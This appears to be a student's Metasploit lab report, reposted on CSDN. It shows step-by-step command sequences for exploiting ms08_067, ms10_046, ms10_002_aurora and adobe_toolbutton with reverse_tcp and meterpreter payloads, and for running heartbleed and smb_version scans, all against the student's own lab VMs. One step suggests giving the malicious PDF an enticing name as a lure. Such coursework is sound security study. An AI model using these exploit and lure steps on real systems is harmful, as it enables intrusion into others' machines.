20155339 Exp5 MSF基础应用

本文介绍了使用Metasploit Framework(MSF)进行渗透测试的过程,包括利用不同类型的漏洞(如ms08_067、ms10_046、ms10_002_aurora和adobe_toolbutton)进行主动攻击、针对浏览器和客户端的攻击,以及使用辅助模块openssl_heartbleed和smb_version进行漏洞扫描。
摘要由CSDN通过智能技术生成

20155339 Exp5 MSF基础应用

基础问题回答

用自己的话解释什么是exploit,payload,encode.
答:
exploit是通过自己选择的漏洞和载荷进行攻击的一个过程。
payload是一段载荷代码,通过这段代码来运行漏洞程序进行对靶机的攻击。
encode是对攻击代码进行编码,保护其能正常运行并且改变其特征码。

实践总结与体会

这次的实践比起前面来说比较实际,但是也有很多限制条件,比如不是所有的系统都可以被攻击。

一个主动攻击实践--ms08_067漏洞

  • 调用该模块:use exploit/windows/smb/ms08_067_netapi并且查看可以使用的载荷show payloads
    1071519-20180428210111681-278836692.png
  • 设置payloadset payload generic/shell_reverse_tcp
  • 设置回连的IPset LHOST 192.168.224.142
  • 设置攻击的端口号set LPORT 5339
  • 设置靶机的IPset RHOST 192.168.224.144
  • 查看有哪些靶机类型show targets
    1071519-20180428210122334-696993858.png
  • 在这里我先选择最简单的0试试set target 0
  • 成功攻击我的靶机,使用一个ipconfig命令来进行验证。
    1071519-20180501121610378-1884819003.png

ms10_046_shortcut_icon_dllloader漏洞

  • 学习了老师提供的漏洞,自己查看并且选择了smb里的别的漏洞,我选择了下面的漏洞。
    1071519-20180501120716159-1798734375.png

  • 查看该模块info windows/smb/ms10_046_shortcut_icon_dllloader可以看到它可以攻击的靶机类型以及需要设置的参数。
    1071519-20180501120728786-763144913.png

  • 同样调用该模块:windows/smb/ms10_046_shortcut_icon_dllloader
  • 设置payload,这里我选择了meterpreter进行tcp反向回连set payload windows/meterpreter/reverse_tcp
  • 设置回连的IPset LHOST 192.168.224.142
  • 设置攻击的端口号set LPORT 5339
  • 设置本地即Kali的IPset SRVHOSTS 192.168.224.144
  • 查看生成的文件名set FILENAME 20155339.lnk
  • exploit会生成一个.lnk文件,将其拷至靶机,并点击运行,查看当前sessions,然后sessions -i idnum就可以观察到攻击机就会看到获得了靶机的shell,使用ipconfig命令来查看是不是靶机的IP,正确。
    1071519-20180501120739652-23726846.png

1071519-20180501120750535-82522368.png

一个针对浏览器的攻击-ms10_002_aurora

  • 尝试了很多很多很多很多,很多很多很多很多次的失败之后,终于有一个可以用了,真的太不容易了。
    1071519-20180501120809744-976416515.png

  • 查看一下该模块info exploit/windows/browser/ms10_002_aurora,可以看出适合所有的Windows的所有版本的IE,以及需要设置的参数。
    1071519-20180501120819142-1793477232.png

  • 设置相关参数:
    • 设置载荷set payload windows/meterpreter/reverse_tcp
    • 设置模块的参数本地IP即Kali的IPset SRVHOST 192.168.224.142
    • 设置回连的IPset LHOST 192.168.224.142
    • 设置端口set LPORT 5339
    • exploit这时候出现下图所示问题,这是端口号被占用,只需要找到占用端口的进程号,然后kill掉它就可以了;
      1071519-20180501120829666-629584341.png

1071519-20180501120840880-376989644.png

  • 再次尝试exploit,可以看到回连成功,并且可以看到创建的会话ID号为9,运行该会话sessions -i 9,成功获得靶机的shell。
    1071519-20180501120852898-1531609467.png

1071519-20180501120903658-1987893140.png

一个针对客户端的攻击——adobe_toolbutton

  • 选择漏洞,可以到/usr/share/metasploit-framework/modules/exploits/windows/fileformat目录下进行选择。
    1071519-20180501120915930-1697764730.png

  • 尝试了好多,自己的靶机也出现如下问题,这个问题可以通过修改注册表的键值或者选择打开方式来解决。
    1071519-20180501120927474-1686761799.png

  • 但是一直无论选择哪个都处于下图所示状态。
    1071519-20180501120937278-327411366.png

  • 换了一台靶机,再次尝试终于成功了。
    1071519-20180501120948390-397385909.png

  • 最后我选择的是adobe_toolbutton,首先查看其模块信息info windows/fileformat/adobe_toolbutton
    1071519-20180501121001346-605495592.png

  • 该模块需要设置的参数只有文件名称,使用该模块use windows/fileformat/adobe_toolbutton选择载荷set payload windows/meterpreter/reverse_tcp,设置载荷需要的参数:set LHOST 192.168.224.142、设置端口set LPORT 5339exploit,设置我的文件名set FILENAME 20155339.pdf文件名可以设的有诱惑性一些,比如毕业晚会安排,exploit会生成我的PDF文档并且显示其路径,按照路径找到该文件夹或者用cp复制到自己实验的文件夹下,注意按路径找的时候需要将隐藏的文件夹设置为可见模,将该PDF文档拷至我的靶机。
    1071519-20180501121013298-453164683.png

  • 攻击机开启监听use exploit/multi/handlerset LHOST 192.168.224.142set LPORT 5339,靶机上双击我的PDF,攻击机连接成功,测试一下ipconfig命令。
    1071519-20180501121023842-2064268531.png

辅助模块——openssl_heartbleed、smb_version

openssl_heartbleed
  • 首先对漏洞进行选择,最后选择了openssl的heartbleed漏洞,首先OpenSSL是非常耳熟能详的开源的SSL,数据加密协议代码其中的漏洞的确是让人害怕。OpenSSL Heartbleed模块存在一个BUG,当攻击者构造一个特殊的数据包,满足用户心跳包中无法提供足够多的数据会导致memcpy把SSLv3记录之后的数据直接输出,该漏洞导致攻击者可以远程读取存在漏洞版本的openssl服务器内存中长达64K的数据。
  • 首先查看一下该模块:info scanner/ssl/openssl_heartbleed
  • 使用该模块:use scanner/ssl/openssl_heartbleed
  • 设置相关参数:set RHOSTS 192.168.224.144,此处我没有设置IP段的范围直接确定了我的靶机;设置线程数set THREADS 50;其他参数我选择了默认值,run
    1071519-20180501121034700-112084935.png

1071519-20180501121045265-830849802.png

  • 运行成功但是我的靶机应该是没有使用OpenSSL的服务,这类可以选择下载并且安装OpenSSL,考虑了我的计算机可能会出现的非主流问题,这类就不花大的时间安装配置它了。尝试一下更多的IP,set RHOSTS 192.168.224.0-192.168.224.0,exploit
    1071519-20180501121056104-1437526326.png

  • 依旧是运行成功,没有发现开启该功能的主机,进行别的尝试。

smb_version
  • 使用该模块use auxiliary/scanner/smb/smb_version
  • 查看它需要什么参数show options
    1071519-20180501121106910-1266266557.png

  • 设置靶机的IP范围set RHOSTS 192.168.224.144,设置线程数set THREADS 100exploit,成功,可以看到我们的靶机的型号。
    1071519-20180501121122388-1555966148.png

  • 再开启我的另一个XP客户机,修改范围set RHOSTS 192.168.224.0-149exploit
    1071519-20180501121136635-188266362.png

  • 可以看到我的两个靶机的版本号。

转载于:https://www.cnblogs.com/pingcpingcuo/p/8969575.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值